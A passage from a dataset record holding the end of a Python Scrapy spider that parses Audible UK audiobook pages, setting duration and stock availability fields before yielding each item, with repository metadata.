t_hour[0]\n item['duration'] = f'{hour}:00'\n elif t_minute:\n item['duration'] = t_minute[0]\n\n av = re.findall(r'(\\w+)$', audiobook_data['offers']['availability'])\n if av:\n if av[0] == 'InStock':\n item['available'] = True\n else:\n item['available'] = False\n\n yield item\n","repo_name":"Barkond/audible_zyte","sub_path":"audible/spiders/audible_co_uk_product.py","file_name":"audible_co_uk_product.py","file_ext":"py","file_size_in_byte":3865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}